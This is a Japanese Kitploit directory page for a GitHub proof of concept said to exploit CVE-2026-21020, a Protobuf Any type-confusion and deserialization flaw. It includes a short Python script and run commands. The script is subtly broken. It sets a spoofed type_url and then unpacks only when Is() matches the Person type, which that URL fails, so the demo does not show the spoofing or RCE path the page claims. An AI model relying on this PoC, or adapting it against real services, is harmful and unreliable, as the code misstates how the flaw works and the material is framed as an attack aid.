Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-21020-Protobuf-Message-Parsing-Polymorphic-Deserialization-Vulnerability — CVE-2026-21020 の PoC。攻撃者が制御する type_url により、ロジックバグ、RCE、または権限昇格につながる可能性がある Protobuf Any 型のポリモーフィックデシリアライゼーションを実証します。 | Kitploit
ツール/GitHubGitHub/george0papasotiriou/cve-2026-21020-protobuf-message-parsing-polymorphic-deserialization-vulnerability
脆弱性分析エクスプロイトペネトレーションテストAPIセキュリティ
GitHubgeorge0papasotiriou/cve-2026-21020-protobuf-message-parsing-polymorphic-deserialization-vulnerability

CVE-2026-21020-Protobuf-Message-Parsing-Polymorphic-Deserialization-Vulnerability

CVE-2026-21020 の PoC。攻撃者が制御する type_url により、ロジックバグ、RCE、または権限昇格につながる可能性がある Protobuf Any 型のポリモーフィックデシリアライゼーションを実証します。

リポジトリを見る

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
16日前未レビュー

CVE-2026-21020 – Protobufメッセージ解析におけるポリモーフィック逆シリアル化の脆弱性

プログラムコード(protobufを使用したPython)

root@kitploit:~
# proto_vuln.py - Insecure handling of Any type
import addressbook_pb2  # Example protobuf

# Simulated deserialization that trusts an injected type_url
from google.protobuf import any_pb2

any_msg = any_pb2.Any()
any_msg.type_url = "type.googleapis.com/attacker.Evil"
any_msg.value = b'\x0a\x05admin'  # serialized payload

# Application unpacks to expected type but could instantiate arbitrary class if using dynamic loading
if any_msg.Is(addressbook_pb2.Person.DESCRIPTOR):
    person = addressbook_pb2.Person()
    any_msg.Unpack(person)
    print("Person unpacked, but type_url was spoofed!")

CVE-2026-21020 – Anyを介したProtobufポリモーフィック逆シリアル化

Severity: Critical

概要

あるサービスは、Protocol BuffersのAny型を使用してメッセージをカプセル化し、期待される型を検証せずにtype_urlフィールドを使って動的にアンパックしています。攻撃者は、危険な(または意図しない)メッセージクラスを指すように細工されたtype_urlを含むメッセージを送信し、ロジックバグやコード実行を引き起こす可能性があります。

脆弱性の詳細

  • 種別: 信頼されないデータの逆シリアル化 / 型混乱
  • 影響: 潜在的なRCEまたは権限昇格。
  • 根本原因: サーバーは、ホワイトリスト化を行わずに攻撃者が制御するtype_urlに基づいてペイロードを逆シリアル化します。

エクスプロイトのデモンストレーション

シミュレーションを実行します:

root@kitploit:~
pip install protobuf
python proto_vuln.py

これは、Any型が偽装可能であることを示しています。コードがtype_urlからクラスを動的にロードする場合、RCEにつながる可能性があります。

ツールをダウンロード